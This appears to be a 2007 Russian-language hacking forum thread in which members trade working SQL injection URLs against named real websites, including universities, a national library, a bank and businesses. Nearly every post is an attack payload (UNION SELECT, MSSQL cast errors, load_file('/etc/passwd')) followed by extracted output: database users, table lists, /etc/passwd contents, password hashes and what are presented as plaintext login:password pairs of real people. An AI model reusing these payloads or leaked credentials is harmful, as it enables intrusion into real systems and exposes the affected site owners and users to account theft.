http://www.turkprogram.com/indir.php?id=-1+union+select+1,concat(char(64,64),email,0x3a,use rname,0x3a,password,char(64,64)),3,4,5,6+from+tbl_ uyeler+limit+0,1/*
Код:
http://www.ncat.edu/press_releases/disp_release.php?ID=-3214+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,concat(user,0x3a,password),17,18+from+mysql.us er+limit+0,1/*
есть еще таблица admins
http://www.vostok-online.ru/index.php?showNewsDetails=1&newsId=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(user(),0x 71),0x71),3,4,5,AES_DECRYPT(AES_ENCRYPT(version(), 0x71),0x71),AES_DECRYPT(AES_ENCRYPT(database(),0x7 1),0x71)/*
4.1.11-Debian_4sarge7-log/disketka_vostok/disketka_vostok@85.249.135.3
-------------------------------------------------------------------
pskov.org.ru
http://www.pskov.org.ru/?action=show&id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7,8,9/*
5.0.44-log/news/infonet@localhost
http://www.pskov.org.ru/?action=show&id=-1+union+select+1,concat_ws(0x2F,name,uname,passwd) ,3,4,5,6,7,8,9+from+admin+limit+0,1/*
имя/логин/пароль не хеш.
Дмитрий Антонюк/master/newsbase и др.
-MoLoToK-
28.10.2007, 00:56
http://www.psychasoc.com/print_news.php?ID=-1+union+select+version(),2,3,4,user()/*
4.0.27-log/psychasoc@192.168.3.5/psychasoc
http://www.vineargenti.com/eng/print_news.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9/*
user: oc/o@/giul - 5
version: ta/3-/4.1. - 5
ohranalist.ru
http://www.ohranalist.ru/index.php?page=news&id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4/*
5.0.41-log/ohranalist/ohranalist@cub.mplik.ru
http://www.ohranalist.ru/index.php?page=news&id=-1+union+select+1,concat_ws(0x2F,login,password),3, 4+from+ohranalist_admin+limit+0,1/*
логин/хеш
http://www.ohranalist.ru/index.php?page=news&id=-1+union+select+1,concat_ws(0x3a,id,ip),3,4+from+oh ranalist_hackers+limit+0,1/*
:D :D на момент написания поста таблица пуста ))
http://www.ohranalist.ru/index.php?page=news&id=-1+union+select+1,concat_ws(0x3a,email,md5rev),3,4+ from+ohranalist_users+limit+11,1/*
мейл/хеш еще есть поле name, но оно почему-то одинаковое для всех юзеров
http://www.bedava-indir.net/detay.php?id=-1+union+select+1,2,aes_decrypt(aes_encrypt(version (),0x71),0x71),4,5,6,7,8/*4.1.18http://www.miracyayinlari.com/mirac/detay.php?id=-1+union+select+1,concat(user(),0x3a,version(),0x3a ,database()),3,4,5,6,7,8,9,10,11,12/*miracyay_acakir@localhost:4.1.22-standard-log:miracyay_siparishttp://pings.ws/directory.php?cat=-1+union+select+1,2,3,4,5,6,aes_decrypt(aes_encrypt (version(),0x71),0x71),8,9/*4.1.11-Debian_4sarge7http://pings.ws/directory.php?cat=-1+union+select+1,2,3,4,5,6,aes_decrypt(aes_encrypt (user,0x71),0x71),8,9+from+mysql.user/*root debian-sys-mainthttp://pings.ws/directory.php?cat=-1+union+select+1,2,3,4,5,6,aes_decrypt(aes_encrypt (password,0x71),0x71),8,9+from+mysql.user/*67457e226a1a15bd *4AAE5200D5AA02DC447305889D972AF35603AF6C htp://pings.ws/directory.php?cat=-1+union+select+1,2,3,4,5,6,aes_decrypt(aes_encrypt (email,0x71),0x71),8,9+from+users/*
htp://pings.ws/directory.php?cat=-1+union+select+1,2,3,4,5,6,aes_decrypt(aes_encrypt (name,0x71),0x71),8,9+from+users/*
htp://pings.ws/directory.php?cat=-1+union+select+1,2,3,4,5,6,aes_decrypt(aes_encrypt (pass,0x71),0x71),8,9+from+users/*
yugcont.ru
http://www.yugcont.ru/news1.php?id=-41+union+select+1,2,3,concat_ws(0x2F,version(),dat abase(),user()),5,6,7,8,9/*
4.0.27-log/yugcont/yugcont@pm17.zenon.net
http://www.yugcont.ru/news1.php?id=-41+union+select+1,2,3,login ,5,6,7,8,9+from+admin/*
логин столбец с паролем не подобрал (
--------------------------------------------------------------------
sibagro.ru
http://www.sibagro.ru/index.php?id_mod=17&id_tmpl=1&id_sect=2&view=article&id_art=-1+union+select+1,2,3,4,5,6,7,8,AES_DECRYPT(AES_ENC RYPT(version(),0x71),0x71),10,11,12,13,14,15,16,17 ,18,19/*
аналогично database() и user()
5.0.19-standard/sibagro/root@localhost
http://www.sibagro.ru/index.php?id_mod=17&id_tmpl=1&id_sect=2&view=article&id_art=-1+union+select+1,2,3,4,5,6,7,8,concat(username,0x3 a,password,0x3a,email),10,11,12,13,14,15,16,17,18, 19+from+usr+limit+0,1/*
имя/пароль/мейл не хеш.
root:Ag5rWn
-MoLoToK-
29.10.2007, 01:01
http://speleogenesis.info/pubalert/show_details.php?PubID=-1+union+select+1,user(),version(),4,5,6,7,8,9,10,1 1/*
4.0.25-standard
speleo3_datauser@localhost
таблицы пока не подобрал
-------------------------------
Для скули http://www.psychasoc.com/print_news.php?ID=-1+union+select+version(),2,3,4,user()/*
таблицы admin
news
phorum_users
users
столбцы login
password
Для любителей Comedy Club
http://rucomedy.com/comments.php?showid=1&serie='
http://www.i-b-m.ru/news.php?act=news_by_id&news_id=-1+union+select+1,2,3,4,5,concat_ws(0x2F,version(), database(),user()),7/*
4.1.22/site_i-b-m_v2/ibm@localhost
--------------------------------------------------------------
http://articles.astrakhan.info/?show=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6,7,8/*
4.0.25/wwwastrakhanlggr/astrak01@hux.hc.ru
--------------------------------------------------------------
http://www.e-concrete.ru/?p=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24
а тут что-то непонятное... вроде скуля есть, но .. посмотрите кому интерстно что это за фигня
Heavy Metal
29.10.2007, 15:16
http://www.mydebut.ru/pubs/show.phtml?id=-1+union+select+1,2,3,load_file(0x2f)
http://www.mydebut.ru/pubs/show.phtml?id=-1+union+select+1,2,3,load_file(0x2f6574632F7061737 37764)
http://www.mydebut.ru/pubs/show.phtml?id=-1+union+select+1,2,concat_ws(0x3a,user,password),3 +from+mysql.user+limit+1,2
http://www.mydebut.ru/pubs/show.phtml?id=-1+union+select+1,2,concat_ws(0x3a,id,login,pass,fU ll_name),4+from+real.admins+limit+0,1
http://www.mydebut.ru/pubs/show.phtml?id=-1+union+select+1,2,concat_ws(0x3a,username,user_pa ssword),4+from+lipskerov.phpbb_users+limit+1,1/*lipskerov.ru
http://domainsdb.net/217.16.18.212
www.pp-pss.ru - Партия Социальной Справедливостиhttp://www.pp-pss.ru/main.php?ID=388072&ar2=50&ar3=-1+union+select+concat_ws(0x3a,version(),database() ,user())/*4.0.27-log:naslDB:naslR@srv5.nasledie.ru
До таблиц так и не докапался (будем работать!)
www.tour-m.ru - Компания "MT event group" Санкт-Петербург специализируется на обслуживании корпоративных клиентов и частных лиц (очень видные клиенты!)http://www.tour-m.ru/about/news.php?id=-1+union+select+1,2,3,concat(aes_decrypt(aes_encryp t(version(),0x71),0x71),0x3a,aes_decrypt(aes_encry pt(database(),0x71),0x71),0x3a,aes_decrypt(aes_enc rypt(user(),0x71),0x71)),5,6/*4.1.10a-standard-log:tourmru_mt:tourmru_mt@localhost
Доступ к users походу закрыт...
Iceangel_
29.10.2007, 16:21
Странную инъекцию сегодня нашел...
http://www.superseeds.com/products.php?cat=27'+union+select+1,2/*
Что в таких случаях надо делать?
K1nD[e]R
29.10.2007, 18:59
http://opel.avto-city.ru/catalog.php?id=-3+union+select+concat(user(),0x3a,version(),0x3a,d atabase(),0x3a,curdate(),0x3a,now()),2,3,4,5,6,7/*
Вывод
host22931@localhost//4.0.27-log//host22931//2007-10-29// 17:52:53
K1nD[e]R
29.10.2007, 19:34
http://www.ascon.ru/order.php?id=-1+union+select+0,1,concat_ws(char(58),ID_MEMBER,me mberName,passwd,emailAddress),3,4+from+forum.smf_m embers+limit+0,1/*
http://www.lsg.ru/index.php?page=sexolog&art=-1'+union+select+1,2,concat_ws(0x2F,version(),datab ase(),user()),4,5,6,7,8,9/*
4.1.22-standard/gilboev_44/gilboev_1@localhost
-----------------------------------------------------------------
http://www.beloretsk.ru/news/view.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6,7,8,9,10/*
4.0.27-max-log/beloret/beloret@v4.valuehost.ru
[53x]Shadow
29.10.2007, 22:23
www.lasc.edu
_http://www.lasc.edu/main.asp?id=-1'+or+1=@@version--
Version:Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
User:lasc
DBName:lasc
случайно наткнулся, кому интересно капайте дальше.
http://www.moldova.ru/index.php?tabName=articles&owner=19&id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7,8,9,10,11,12,13/*
4.1.19-standard-log/moldova_moldova/moldova_design@sr.dualg.com
-------------------------------------------------------------------
infobank.mossport.ru
http://www.infobank.mossport.ru/org_browse.asp?CatID=3880&FirmID=-1+or+1=@@version
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
DB: casper
User:cabi
http://www.infobank.mossport.ru/org_browse.asp?CatID=3880&FirmID=-1+or+1=(select+top+1+cast(login+as+nvarchar)%2B%27 %3A%27%2Bcast(passw+as+nvarchar)+from+tMKSInetUser +where+UserID=1)--
логин/пароль
-MoLoToK-
30.10.2007, 00:22
http://www.llrickard.com/show_details.php?id=1179933989+union+select+1,2,3, 4,5,6,7,8,9/*
не выводит таблицы
--------------------------------------------------
http://www.ewms.ltd.uk/show_details.php?recordID=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7,8/*
version:4.1.22-standard-log
user:
ukbf@server213-171-219-234.livedns.org.uk
DB:
readymade
таблицы: news, users
--------------------------------------------------
http://www.karakteruitgevers.nl/show_details.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41/*
Пипец таблиц много
delay(0)
30.10.2007, 01:23
случайно наткнулся, кому интересно капайте дальше.
http://www.lasc.edu/admin/ - админка
Таблицы:
'IMPORTprofessors',
'categories',
'classes',
'courses',
'dtproperties',
'extension_tbl',
'files',
'filetype_tbl',
'history_tbl',
'homework',
'IMPORTclasses',
'IMPORTcourses',
'media_tbl',
'OLDclasses','OLDcourses','OLDprofessors',
'professors',
'redirects',
'semesters',
'skyroot',
'subjects',
'sysconstraints',
'syssegments',
'user_rights',
'user_rights_pages',
'users',
'wysiwyg_tbl',
'comd_list',
'D99_Tmp',
'faculty_documents',
'faculty_info',
'faculty_links',
'jiaozhu',
'kill_kk',
'My_Cmd_Tmp2876418714116'
-----
Выводил из users:
http://www.lasc.edu/main.asp?id=-1'+or+1=(select+top+1+cast(username+as+nvarchar)%2 B%27%3A%27%2Bcast(password+as+nvarchar)+from+users )--
chilinma:btsariel*12
larsonl:miriam*12
gallagherm:maryg*12
MageeCL:business*15
medinamr:torres*12
http://www.lasc.edu/main.asp?id=-1'+or+1=(select+top+1+cast(username+as+nvarchar)%2 B%27%3A%27%2Bcast(password+as+nvarchar)+from+users ++where+username+not+in('chilinma','larsonl','gall agherm','MageeCL'))--
----
Дальше капать лень... ^^
Iceangel_
Странную инъекцию сегодня нашел...
http://www.superseeds.com/products.php?cat=27'+union+select+1,2/*
Что в таких случаях надо делать?
А с чего ты взял, что она там вообще есть?
Elvis000
30.10.2007, 10:20
Парапсихология - Пути к истине от RIN.RU
http://istina.rin.ru/cgi-bin/print.pl?sait=2&id=-1'+UNION+SELECT+1,2,3/* все читается в заголовке страницы.
user:postcards@192.168.1.234
version:4.0.26
base:ufo
есть доступ в mysql.user но кроме имен ничего не дает
chat, igor, sergey, qmail, по крайней мере я не смог.
прочиталось:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nol
/var/www/html/hosts/nataly/istina/ по моему можно получить шелл, не уверен, только учусь.
в антибояне есть money.rin.ru, state.rin.ru
izhbowling.ru
http://www.izhbowling.ru/site.php?SMsPId=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6,7,8,9,10/*
4.1.22-STANDARD/IZHBOWLI_DB/IZHBOWLI_US@LOCALHOST
http://www.izhbowling.ru/site.php?SMsPId=-1+union+select+1,2,concat_ws(0x2F,username,user_pa ssword,user_icq),4,5,6,7,8,9,10+from+phpbb_users+l imit+1,1/*
логин/хеш/уин
0nep@t0p
30.10.2007, 14:46
http://www.individual.com/
Какая-то крупная контора, что-то вроде своего блога...
http://www.individual.com/newsdesk.php?industry=business'+union+select+1,2,c oncat(user,0x3a,password),4,5,6,7,8+from+mysql.use r/*
Version: 4.0.14-standard-log
User: idc_v3@localhost
mysql.user:
root:7725046d7c65a8e3
idc_v3:7725046d7c65a8e3
s2sys:74b461150a6eacc4
s2user:3761b1e6152af41e
ftlc:4e2d333721893319
http://www.individual.com/newsdesk.php?industry=business'+union+select+1,2,L OAD_FILE('/etc/passwd'),4,5,6,7,8/*
Есть табла account в ней нащупал только одну колонку - passwd, но не могу найти колонку с логинами...
http://www.individual.com/newsdesk.php?industry=business'+union+select+1,2,p asswd,4,5,6,7,8+from+account/*
Количество юзверей впечатляет +/- 25 000
Y.Dmitriy
30.10.2007, 15:34
Национальный банк Таджикистана...
http://www.nbt.tj/en/?c=44&id=44&a=1+union+select+1,version(),user(),4,5/*
arhd.ruhttp://arhd.ru/element.html?rid=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8/*4.0.23-log:arhd:arhd@213.219.217.68
Elvis000
30.10.2007, 16:37
Fashion Time фото
http://www.ft-foto.ru/stat.php?action=article_view&id=-1+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10+FROM+ INFORMATION_SCHEMA.TABLES+LIMIT+1,1/*
user: ft_foto_ru@localhost
version: 5.0.24a-log
database: ft_foto_ru
http://www.triantaphyllides.org/newscontent.php?id=-15%20UNION%20SELECT%201,2,3,4,5,6,7,8,9/*
база
http://www.triantaphyllides.org/newscontent.php?id=-15%20UNION%20SELECT%201,2,password,4,username,6,7, 8,9+FROM+users/*
вход в админку
http://www.triantaphyllides.org/admin/login.php?accessdenied=%2Fadmin%2Findex.php
http://www.corkaghpark.com/newscontent.php?id=-90%20UNION%20SELECT%201,2,3,passwd,username+FROM+u sers/*
пасс зашифрован, только он супер лёгкий...админка зато офигенная )
http://www.aic.ie/site/newscontent.php?id=-8%20UNION%20SELECT%201,2,passwd,4,5+FROM+admin/*
всё думаю пнятно
bookshop.ua
Version: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
db_name: Shop2
system_user: webuser
Вот первые 100 таблиц:
http://www.bookshop.ua/Asp/teletype.asp?Content=3531+or+1=(SELECT+TOP+1+TABLE _NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_N AME+NOT+IN+('TypePaher','News','Visits_page','all_ kn_z_1','Post','__BAKU','__Export','__OzonPictures Big','__OzonPicturesSmall','__vw_baku','_Temp_New_ Price_FileName','_vw_All_Book','_vw_BigMir_XML_cur rency','_vw_BigMir_XML_Item','_vw_BigMir_XML_Price ','_vw_BookLit_Price','_vw_Coef_For_Report_TOP1000 ','_vw_CustomerGross','_vw_DeliveryToPayment','_vw _Discount_Book','_vw_New_Publishing','_vw_New_Seri esThema','_vw_OBV_Catalog','_vw_OBV_Export_1','_vw _Price','_vw_Report_TOP50_Author','_vw_Report_TOP5 0_Publishig','_vw_site_Menu','_vw_Subscribe_News', '_vw_View_Zayavka','1c','Account_Jur','Account_Pri vate','Action','all_kn_z','BHV','Bonus','Book_for_ portal','BooksPrice','BooksZakaz','bs_ozon','BSM_B ooksPrice','CatalogBooks','CatalogNum','CatalogThe ma','Club','Coef','cost_delivery','CounDaliv','Cou ntry','Currency','CurrencyUse','Dalivery','Date_Ex port','Doc','Dolg_Books','Dolg_Books_K','Dolg_Book s2','Dostavka','dtproperties','Enterprise','Entr_D ','Exchange','FD','ForgetOrder','GuestBook','Insto re','komplekt_z','komplekt_zakaz','Konkurs','MaxRe alReestrK_ID','MaxRealReestrP_ID','Message','Messa geInProcedure','MiniPortal','NameNews','Not_Form_O zon','NotMoney_NP','Obzor','Opl_N_Otpr','Other_Z_K n','Pather','Payment','Picture_URL','Portal','Port al_Books','Postperevod','PP_ACTION','PP_ADM','PP_N AMES','PP_PAYMENTS','PP_TYPE','Publishing','QuestA nk','Question','QuestionAnswer','Quickly','ReestrK ','ReestrP','Regions','Release','SendNews','Series ','Shipment','Statement','subscriber','subscriptio n','sysconstraints','syssegments','Talk','tbl_Book Advice','tbl_Catalog','tbl_Catalog_To_Best','tbl_C atalog_TOP5_Best','tbl_CatalogToGoods','tbl_Catolo gTree','tbl_CorparateOrder','tbl_DistrictUa'))--
http://www.bookshop.ua/Asp/teletype.asp?Content=3531+or+1=(SELECT+TOP+1+cast( admPwd+as+nvarchar)%2B%27%3A%27%2Bcast(SMTPpwd+as+ %20nvarchar)+%2B%27%3A%27%2Bcast(SMTPuser+as+%20nv archar)+from+PP_ADM)--
xx:xx:GeneralManager
Админку не нашел
lsass.exe
31.10.2007, 00:00
http://deznet.ru/cat.php?category=-1+union+select+1,2,version(),4,5,6,database(),user (),9,10,11,12,13/*
deznetr_infectio@localhost
5.0.45-log
deznetr_dez
www.rusins.ru - Русский Страховой Центрhttp://www.rusins.ru/ru/index.php?newid=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versio n(),database(),user()),9/*4.0.20-log:rusins:rusins@localhost
www.csr.ru - Центр Стратегических Разработокhttp://www.csr.ru/theme/theme.php?idt=-1+union+select+concat_ws(0x3a,version(),database() ,user())/*4.0.14-standard-log:csr:root@localhost
http://www.csr.ru/theme/theme.php?idt=-1+union+select+load_file(0x2f6574632f706173737764) +from+mysql.user/*root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin
0nep@t0p
31.10.2007, 13:07
http://www.coogans-run.co.uk/
http://www.coogans-run.co.uk/h/steve-coogan-newsitem.php?id=-50+union+select+1,concat(username,0x3a,password),3 ,4,5,6,7,8,9,10,11,12+from+users/*
Админку или любое другое поле для авторизации найти не смог...
Version: 4.1.20
User: hullabal00@193.111.201.160
http://www.odeonfilm.de/
http://www.odeonfilm.de/film_01_01_01.php?id=-153+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49,50,51,52,53,54,55,56,57,login,59,60,61,62,63, 64+from+users/*
В таблице users нашел только колонку с именами - login, а вот с пассами не смог...
Version: 4.0.24_Debian-10sarge2-log
User: odeonfilm@localhost
http://www.kino.com/
http://www.kino.com/theatrical/th_item.php?film_id=-778+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat (version(),0x3a,user()),14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/*
Version: 4.0.12-standard
User: kino@lma671.siteprotect.com
http://www.zebrafilm.pl/
http://www.zebrafilm.pl/index.php?page=filmy&lang=eng&sub=fabula&sub2=details&filmID=-77+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,version(),28,29 ,30/*
Version: 5.0.45-log
User: zebrafilm@aoc175.rev.netart.pl
chelmarket.ruhttp://www.chelmarket.ru/show_goods_simple.php?cod=-1+union+select+concat(aes_decrypt(aes_encrypt(vers ion(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(dat abase(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(u ser(),0x71),0x71))/*4.1.15-log:chelmarket:3wchelmarket@deimos.surnet.ru
kratos.ru - Кратос-компьютерсhttp://www.kratos.ru/price.php?dir=3&sub=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4/*4.1.22-standard-log:kratos_chel:kratos_chel@localhost
trubaopt.ruhttp://www.trubaopt.ru/?page=board&pos=0&vol=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a ,version(),database(),user()),12,13,14/*&pg=1264.0.26-log:udb2183:Uwww2183S@localhost
Таблицы не поддаются :mad:
http://www.odeonfilm.de/
http://www.odeonfilm.de/film_01_01_01.php?id=-153+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49,50,51,52,53,54,55,56,57,login,59,60,61,62,63, 64+from+users/*
В таблице users нашел только колонку с именами - login, а вот с пассами не смог...
Version: 4.0.24_Debian-10sarge2-log
User: odeonfilm@localhost
Сайт в зоне .de, логично предположить, что колонка password может быть на немецком, т.е. passwort =) также там есть колонка email
http://www.odeonfilm.de/film_01_01_01.php?id=-153+union+select+1,2,3,4,5,6,7,8,9,passwort,11,ema il,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31%20%20,32,33,34,35,36,37,38,39,40,41,42,4 3,44,45,46,47,48,49,50,51,52,53,54,55,56,57,login, 59,60,61,62,63,64+from+users/*
autoindex.ruhttp://www.autoindex.ru/news/index.php?id_cat=&page=1&id_news=-1+union+select+1,2,concat(aes_decrypt(aes_encrypt( version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt (database(),0x71),0x71),0x3a,aes_decrypt(aes_encry pt(user(),0x71),0x71)),4,5,6,7,8,9,10/*&ye=2004.1.18:autoindex:root@localhost
http://www.autoindex.ru/news/index.php?id_cat=&page=1&id_news=-1+union+select+1,2,concat(aes_decrypt(aes_encrypt( load_file(0x2f6574632f706173737764),0x71),0x71)),4 ,5,6,7,8,9,10+from+mysql.user/*&ye=200
Российская национальная библиотека
http://www.nlr.ru/news/vid_news.php?id=-641+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35/*
КЕНТ33
http://www.nlr.ru/news/vid_news.php?id=-641+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35/*Раскручивай дальше:http://www.nlr.ru/news/vid_news.php?id=-641+UNION+SELECT+1,2,concat(aes_decrypt(aes_encryp t(version(),0x71),0x71),0x3a,aes_decrypt(aes_encry pt(database(),0x71),0x71),0x3a,aes_decrypt(aes_enc rypt(user(),0x71),0x71)),4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35/*5.0.18-Debian_9-log:nlr_news:news_admin@localhost
28 таблиц:http://www.nlr.ru/news/vid_news.php?id=-641+UNION+SELECT+1,2,aes_decrypt(aes_encrypt(table _name,0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,3 3,34,35+from+information_schema.tables+limit+27,1/*и т.д.
phol1eadeux
31.10.2007, 17:21
Газета Панорама TV
+++++++++++++++++++
Инъекция:
http://www.pantv.ru/pantv/partners.asp?re=(SQL-inj)&re1=partner
Нашел одну стоящую таблицу PANTVRazdel. Сайт, вероятно, обновляется не через WEB.
Колонки таблицы:
PANTVRazdel_ID
PANTVRazdel_Name
PANTVRazdel_Active
PANTVRazdel_URL
PANTVRazdel_Menu
Серенький
31.10.2007, 17:33
KEHT33
Российская национальная библиотека
Код HTML:
http://www.nlr.ru/news/vid_news.php?id=-641+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35/*
fRg
Раскручивай дальше:
Код:
http://www.nlr.ru/news/vid_news.php?id=-641+UNION+SELECT+1,2,concat(aes_decrypt(aes_encryp t(version(),0x71),0x71),0x3a,aes_decrypt(aes_encry pt(database(),0x71),0x71),0x3a,aes_decrypt(aes_enc rypt(user(),0x71),0x71)),4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35/*
5.0.18-Debian_9-log:nlr_news:news_admin@localhost
28 таблиц:
Код:
http://www.nlr.ru/news/vid_news.php?id=-641+UNION+SELECT+1,2,aes_decrypt(aes_encrypt(table _name,0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,3 3,34,35+from+information_schema.tables+limit+27,1/*
и т.д.
Есть вывод и без лимита:
http://www.nlr.ru/news/index.php?where=vybor&date_vyb1=20070401&date_vyb2=-20070630+union+select+1,2,aes_decrypt(aes_encrypt( concat_ws(0x3a,table_schema,table_name,column_name ),0x55),0x55),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1, 2,3,4,5,6,7,8,9,0,1,2,3,4,5+from+information_schem a.columns/*
http://www.vdr.com.ua/cat.php?id=-1+UNION+SELECT+1,concat(user(),0x3a,database(),0x2 a,version()),3,4/*
http://www.mastercity.ru/arch/show_content.php?id=74'+union+select+1,2,3,concat( username,0x3a,password),5,6,7,8+from+admin/*
admin:711de2ca756942dc
http://www.mastercity.ru/admin
http://dalmacija.net/site/articles/articleshow.php?id=-1+union+select+1,2,3,concat(username,char(58),pass word,char(58)),5,6,7,8,9,10,11+from+users/*
http://www.rollerclub.ru/agressive/view/fullview.php?id=-1+union+select+1,2,3,4,5,6,concat(name,char(58),pa ssword,char(58),user_email),8,9,10,11,12,13+from+u sers+limit+1,1/*
-MoLoToK-
31.10.2007, 22:19
http://www.muskoka.ambulance.ca/articleshow.php?article=-1+UNION+SELECT+1,convert(version(),binary),3,4,5,6 ,convert(user(),binary)/*
4.1.16
masnews@localhost
Фильтрует скобку
K1nD[e]R
01.11.2007, 00:04
http://www.ecom-info.spb.ru/indicators/print.php?id=-428+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,con cat(version(),user(),database()),system_user(),16, 17,18,19,20,21,22,23,24,25,26/*
http://www.widgetmonkey.com/detail.php?id=-1+union+select+1,user(),3,4,database()/*
http://www.murom.ru/article.php?sid=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x2f,ve rsion(),database(),user()),11,12/*
4.0.24-log/nuke/show@localhost
----------------------------------------------------------------------
http://www.olimp.chita.ru/photos.php?upid=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user()),5,6,7,8,9,10/*
5.0.27/m$olymp/m$olymp@localhost
http://www.olimp.chita.ru/photos.php?upid=-1+union+select+1,2,3,concat_ws(0x2F,username,passw ord),5,6,7,8,9,10+from+auth_user/*
логин\пас не хеш.
K1nD[e]R
01.11.2007, 00:14
http://www.nlr.ru/news/vid_news.php?id=-723+union+select+1,2,3,load_file('etc/passwd'),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/*
K1nD[e]R
01.11.2007, 00:21
http://www.big6.com/showarticle.php?id=-415+union+select+concat(user(),version(),database( )),2,3,4,5/*
big6@localhost
ekaterininskiy.ru
http://www.ekaterininskiy.ru/index.php?page=catalog&top=-1+union+select+concat_ws(0x2F,version(),database() ,user()),2/*
5.0.41-log/ekaterininskiy/ekaterininskiy@cub.mplik.ru
http://www.ekaterininskiy.ru/index.php?page=catalog&top=-1+union+select+1,concat_ws(0x2F,login,password)+fr om+users/*
логин/хеш
http://www.ekaterininskiy.ru/index.php?page=catalog&top=-1+union+select+1,concat_ws(0x2F,login,password)+fr om+ekat_admin/*
admin/5f4dcc3b5aa765d61d8327deb882cf99
K1nD[e]R
01.11.2007, 00:30
http://www.abandoned.ru/pic.php?id=-363+union+select+1,2,3,concat(user(),version()),5, 6/*
uryevich@localhost:4.0.18
http://www.3d02.com/html_Gallery/gallery_still_image.asp?id=1536+or+1=(SELECT+TOP+1 +cast(user+as+nvarchar)%2B%27%3A%27%2Bcast(passwor d+as+nvarchar)+from+Admin)--
Логин пароль Админа
http://www.3d02.com/admin
Но почему-то не подходит :(
ЛифчиС5СВ
01.11.2007, 03:24
Привед БанкокчеГи
Bangkok's Independent Newspaper
http://www.nationmultimedia.com/qvote/view_poll.php?page=12&pid=900+union+select+1,2
Не подобрал, но очень удобно говорят, что кол-во столбцов неверное, и на таком-то сайте! Красотища! = )
> 10 столбцов.
-MoLoToK-
01.11.2007, 03:49
Привед БанкокчеГи
Bangkok's Independent Newspaper
http://www.nationmultimedia.com/qvote/view_poll.php?page=12&pid=900+union+select+1,2
Не подобрал, но очень удобно говорят, что кол-во столбцов неверное, и на таком-то сайте! Красотища! = )
> 10 столбцов.
вроде так и есть 2 столбца
http://www.nationmultimedia.com/qvote/view_poll.php?page=12&pid=-1+union+select+1,convert(concat(user(),0x3a,databa se(),0x2a,version()),binary)/*
выводит версию,DB,юзера
Оба таблица mysql.user
